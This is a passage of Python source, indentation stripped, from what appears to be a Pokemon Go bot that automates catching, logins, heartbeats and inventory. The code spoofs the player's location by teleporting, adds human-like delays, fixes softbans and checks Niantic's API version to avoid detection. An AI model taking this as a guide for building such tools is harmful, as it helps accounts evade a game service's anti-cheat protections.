parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'incensed_pokemon_found',
parameters=(
'pokemon_id',
'encounter_id',
'encounter_location',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'shiny'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event('lure_success')
self.event_manager.register_event('lure_failed')
self.event_manager.register_event('lure_not_enough')
self.event_manager.register_event('lure_info')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'vanish_limit_reached',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'shiny',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_vip_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'shiny',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'new', 'iv', 'old_cp', 'cp', 'candy', 'xp')
)
self.event_manager.register_event(
'pokemon_favored',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event(
'pokemon_unfavored',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event(
'pokemon_evolve_check',
parameters=('has', 'needs')
)
self.event_manager.register_event(
'pokemon_upgraded',
parameters=('pokemon', 'iv', 'cp', 'new_cp', 'candy', 'stardust')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('gained_candy', 'quantity', 'type'))
self.event_manager.register_event('catch_limit')
self.event_manager.register_event('spin_limit')
self.event_manager.register_event('show_best_pokemon', parameters=('pokemons'))
self.event_manager.register_event('revived_pokemon')
self.event_manager.register_event('healing_pokemon')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'name', 'cp', 'ncp', 'iv_ads', 'iv_pct', 'exp', 'stardust', 'candy'
)
)
self.event_manager.register_event('egg_hatched_fail')
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'ivcp', 'below_iv', 'below_cp', 'below_ivcp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'ivcp', 'candy', 'candy_type')
)
self.event_manager.register_event(
'pokemon_keep',
parameters=('pokemon', 'iv', 'cp', 'ivcp')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
self.event_manager.register_event(
'move_to_map_pokemon',
parameters=('message')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('vanish_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
self.event_manager.register_event('eggs_hatched_log')
self.event_manager.register_event(
'badges',
parameters=('badge', 'level')
)
self.event_manager.register_event(
'player_data',
parameters=('player_data', )
)
self.event_manager.register_event(
'forts_found',
parameters=('json')
)
# UseIncense
self.event_manager.register_event(
'use_incense',
parameters=('type', 'incense_count')
)
# BuddyPokemon
self.event_manager.register_event(
'buddy_update',
parameters=('name')
)
self.event_manager.register_event(
'buddy_update_fail',
parameters=('name', 'error')
)
self.event_manager.register_event(
'buddy_candy_earned',
parameters=('candy', 'family', 'quantity', 'candy_earned', 'candy_limit')
)
self.event_manager.register_event('buddy_candy_fail')
self.event_manager.register_event(
'buddy_next_reward',
parameters=('name', 'km_walked', 'km_total')
)
self.event_manager.register_event('buddy_keep_active')
self.event_manager.register_event(
'buddy_not_available',
parameters=('name')
)
# Sniper
self.event_manager.register_event('sniper_log', parameters=('message', 'message'))
self.event_manager.register_event('sniper_error', parameters=('message', 'message'))
self.event_manager.register_event('sniper_teleporting', parameters=('latitude', 'longitude', 'name'))
# Catch-limiter
self.event_manager.register_event('catch_limit_on')
self.event_manager.register_event('catch_limit_off')
self.event_manager.register_event(
'pokemon_knock_out_gym',
parameters=('pokemon', 'gym_name', 'notification_date', 'awarded_coins', 'awarded_coins_today')
)
self.event_manager.register_event(
'pokemon_hungy',
parameters=('pokemon', 'gym_name', 'notification_date')
)
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
if self.sleep_schedule:
self.sleep_schedule.work()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self._refresh_inventory()
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
nearby_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
if "nearby_pokemons" in cell and len(cell["nearby_pokemons"]):
latlng = LatLng.from_point(Cell(CellId(cell["s2_cell_id"])).get_center())
for p in cell["nearby_pokemons"]:
p["latitude"] = latlng.lat().degrees
p["longitude"] = latlng.lng().degrees
p["s2_cell_id"] = cell["s2_cell_id"]
nearby_pokemons += cell["nearby_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
# dont cache when teleport_to
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def emit_forts_event(self,response_dict):
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
if map_cells and len(map_cells):
for cell in map_cells:
if "forts" in cell and len(cell["forts"]):
self.event_manager.emit(
'forts_found',
sender=self,
level='debug',
formatted='Found forts {json}',
data={'json': json.dumps(cell["forts"])}
)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not str(self.api._auth_provider._ticket_expire).isdigit():
self.logger.info("Ticket expired value is not numeric", 'yellow')
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
def login(self):
status = {}
retry = 0
quit_login = False
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
while not quit_login:
try:
self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password))
# No exception, set quit_login = true
quit_login = True
except AuthException as e:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted='Login process failed: {}'.format(e)
)
# Exception encountered. Retry 3 times, everytime increase wait time 5 secs
retry += 1
sleeptime = retry*5
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Retry {} time(s) for {} secs".format(retry,sleeptime)
)
sleep(retry*5)
# Quit after 3rd tries
if retry == 3:
sys.exit()
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
# Start of security, to get various API Versions from different sources
# Get Official API
link = "https://pgorelease.nianticlabs.com/plfe/version"
f = urllib2.urlopen(link)
myfile = f.read()
f.close()
officalAPI = myfile[2:8]
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Niantic Official API Version: {}".format(officalAPI)
)
PGoAPI_version = PGoApi.get_api_version()
PGoAPI_version_str = str(PGoAPI_version)
PGoAPI_version_str = "0."+ PGoAPI_version_str[0:2] + "." + PGoAPI_version_str[-1]
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Bot is currently running on API {}".format(PGoAPI_version_str)
)
if self.config.check_niantic_api is True:
if HashServer.endpoint == "":
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Warning: Bot is running on legacy API"
)
else:
officialAPI_int = int(officalAPI.replace('.',''))
PGoAPI_version_tmp = str(PGoAPI_version)
PGoAPI_version_tmp = PGoAPI_version_tmp[0:2] + PGoAPI_version_tmp[-1]
PGoAPI_version_int = int(PGoAPI_version_tmp)
if PGoAPI_version_int < officialAPI_int:
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="We have detected a Pokemon API Change. Latest Niantic Version is: {}. Program Exiting...".format(officalAPI)
)
sys.exit(1)
else:
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Current PGoAPI is using {} API. Niantic API Check Pass".format(PGoAPI_version_str)
)
self.heartbeat()
def _setup_api(self):
# instantiate pgoapi @var ApiWrapper
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
request = self.api.create_request()
request.get_player()
response_dict = request.call()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
warn = False
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
if 'warn' in response_dict['responses']['GET_PLAYER']:
warn = response_dict['responses']['GET_PLAYER']['warn']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | Great Balls: ' + str(items_inventory.get(2).count) +
' | Ultra Balls: ' + str(items_inventory.get(3).count) +
' | Master Balls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | Nanab Berries: ' + str(items_inventory.get(703).count) +
' | Pinap Berries: ' + str(items_inventory.get(705).count) +
' | Golden RazzBerries: ' + str(items_inventory.get(706).count) +
' | Golden Nanab Berries: ' + str(items_inventory.get(707).count) +
' | Golden Pinap Berries: ' + str(items_inventory.get(708).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | Super Potion: ' + str(items_inventory.get(102).count) +
' | Hyper Potion: ' + str(items_inventory.get(103).count) +
' | Max Potion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | Lure Module: ' + str(items_inventory.get(501).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | Max Revive: ' + str(items_inventory.get(202).count))
self.logger.info(
'Sun Stone: ' + str(items_inventory.get(1101).count) +
' | Kings Rock: ' + str(items_inventory.get(1102).count) +
' | Metal Coat: ' + str(items_inventory.get(1103).count) +
' | Dragon Scale: ' + str(items_inventory.get(1104).count) +
' | Upgrade: ' + str(items_inventory.get(1105).count))
self.logger.info(
'Fast TM: ' + str(items_inventory.get(1201).count) +
' | Charge TM: ' + str(items_inventory.get(1202).count) +
' | Rare Candy: ' + str(items_inventory.get(1301).count) +
' | Free Raid Pass: ' + str(items_inventory.get(1401).count) +
' | Premium Raid Pass: ' + str(items_inventory.get(1402).count) +
' | Legendary Raid Pass: ' + str(items_inventory.get(1403).count))
if warn:
self.logger.info('')
self.event_manager.emit(
'niantic_warning',
sender=self,
level='warning',
formatted="This account has recieved a warning from Niantic. Bot at own risk."
)
sleep(5) # Pause to allow user to see warning
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
pokes.sort(key=lambda p: p.cp, reverse=True)
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
request = self.api.create_request()
request.use_item_xp_boost(item_id=301)
return request.call()
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.wake_location:
msg = "Wake up location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': self.wake_location['raw'],
'position': self.wake_location['coord']
}
)
self.api.set_position(*self.wake_location['coord'])
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
json_file = os.path.join(_base_dir, 'data', 'last-location-%s.json' % self.config.username)
try:
with open(json_file, "r") as infile:
location_json = json.load(infile)
except (IOError, ValueError):
# Unable to read json file.
# File may be corrupt. Create a new one.
location_json = []
except:
raise FileIOException("Unexpected error reading from {}".web_inventory)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if given location name, belongs to favorite_locations
favorite_location_coords = self._get_pos_by_fav_location(location_name)
if favorite_location_coords is not None:
return favorite_location_coords
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}(?:[.]\d+)?", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def _get_pos_by_fav_location(self, location_name):
location_name = location_name.lower()
coords = None
for location in self.config.favorite_locations:
if location.get('name').lower() == location_name:
coords = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location.get('coords').strip()
)
if len(coords) >= 2:
self.logger.info('Favorite location found: {} ({})'.format(location_name, coords))
break
#TODO: This is real bad
if coords is None:
return coords
else:
return float(coords[0]), float(coords[1]), (float(coords[2]) if len(coords) == 3 else self.alt)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold and not self.hb_locked:
previous_heartbeat = self.last_heartbeat
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.get_inbox()
responses = None
try:
responses = request.call()
except NotLoggedInException:
self.logger.warning('Unable to login, retying')
self.empty_response = True
except:
self.logger.warning('Error occured in heatbeat, retying')
self.empty_response = True
if not self.empty_response:
if responses['responses']['GET_PLAYER']['success'] == True:
# we get the player_data anyway, might as well store it
self._player = responses['responses']['GET_PLAYER']['player_data']
self.event_manager.emit(
'player_data',
sender=self,
level='debug',
formatted='player_data: {player_data}',
data={'player_data': self._player}
)
if responses['responses']['GET_INBOX']['result'] == 1:
self._inbox = responses['responses']['GET_INBOX']['inbox']
# self.logger.info("Got inbox messages?")
# self.logger.info("Inbox: %s" % responses['responses']['GET_INBOX'])
if 'notifications' in self._inbox:
for notification in self._inbox['notifications']:
notification_date = datetime.datetime.fromtimestamp(int(notification['create_timestamp_ms']) / 1e3)
if previous_heartbeat > (int(notification['create_timestamp_ms']) / 1e3):
# Skipp old notifications!
continue
if notification['category'] == 'pokemon_hungry':
gym_name = pokemon = 'Unknown'
for variable in notification['variables']:
if variable['name'] == 'GYM_NAME':
gym_name = variable['literal']
if variable['name'] == 'POKEMON_NICKNAME':
pokemon = variable['literal']
self.event_manager.emit(
'pokemon_hungy',
sender=self,
level='info',
formatted='{pokemon} in the Gym {gym_name} is hungy and want a candy! {notification_date}',
data={
'pokemon': pokemon,
'gym_name': gym_name,
'notification_date': notification_date.strftime('%Y-%m-%d %H:%M:%S.%f')
}
)
if notification['category'] == 'gym_removal':
gym_name = pokemon = 'Unknown'
for variable in notification['variables']:
if variable['name'] == 'GYM_NAME':
gym_name = variable['literal']
if variable['name'] == 'POKEMON_NICKNAME':
pokemon = variable['literal']
if variable['name'] == 'POKECOIN_AWARDED':
coins_awared = variable['literal']
if variable['name'] == 'POKECOIN_AWARDED_TODAY':
coins_awared_today = variable['literal']
self.event_manager.emit(
'pokemon_knock_out_gym',
sender=self,
level='info',
formatted='{pokemon} has been knocked out the Gym {gym_name} at {notification_date}. Awarded coins: {awarded_coins} | Today awared: {awarded_coins_today}',
data={
'pokemon': pokemon,
'gym_name': gym_name,
'notification_date': notification_date.strftime('%Y-%m-%d %H:%M:%S.%f'),
'awarded_coins': coins_awared,
'awarded_coins_today': coins_awared_today
}
)
if responses['responses']['CHECK_AWARDED_BADGES']['success'] == True:
# store awarded_badges reponse to be used in a task or part of heartbeat
self._awarded_badges = responses['responses']['CHECK_AWARDED_BADGES']
if 'awarded_badges' in self._awarded_badges:
i = 0
for badge in self._awarded_badges['awarded_badges']:
badgelevel = self._awarded_badges['awarded_badge_levels'][i]
badgename = badge_type_pb2._BADGETYPE.values_by_number[badge].name
i += 1
self.event_manager.emit(
'badges',
sender=self,
level='info',
formatted='awarded badge: {badge}, lvl {level}',
data={'badge': badgename,
'level': badgelevel}
)
human_behaviour.action_delay(3, 10)
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
threading.Timer(self.heartbeat_threshold, self.heartbeat).start()
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
#skip undate if no response
if not self.empty_response:
self.update_web_location()
def display_player_info(self):
player_stats = player()
if player_stats:
nextlvlxp = (int(player_stats.next_level_xp) - int(player_stats.exp))
self.logger.info(
'Level: {}'.format(player_stats.level) +
' (Next Level: {} XP)'.format(nextlvlxp) +
' (Total: {} XP)'
''.format(player_stats.exp))
self.logger.info(
'Pokemon Captured: '
'{}'.format(player_stats.pokemons_captured) +
' | Pokestops Visited: '
'{}'.format(player_stats.poke_stop_visits))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'longitude' in fort]
# Need to filter out disabled forts!
forts = filter(lambda x: x["enabled"] is True, forts)
forts = filter(lambda x: 'closed' not in fort, forts)
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_gyms(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' not in fort]
# Need to filter out disabled gyms!
forts = filter(lambda x: x["enabled"] is True, forts)
forts = filter(lambda x: 'closed' not in fort, forts)
# forts = filter(lambda x: 'type' not in fort, forts)
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
request = self.api.create_request()
request.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_map_object = request.call()
self.emit_forts_event(self.last_map_object)
#if self.last_map_object:
# print self.last_map_object
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
cached_recent_forts = []
try:
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
except (IOError, ValueError) as e:
self.logger.info('[x] Error while opening cached forts: %s' % e)
except:
raise FileIOException("Unexpected error opening {}".cached_forts_path)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
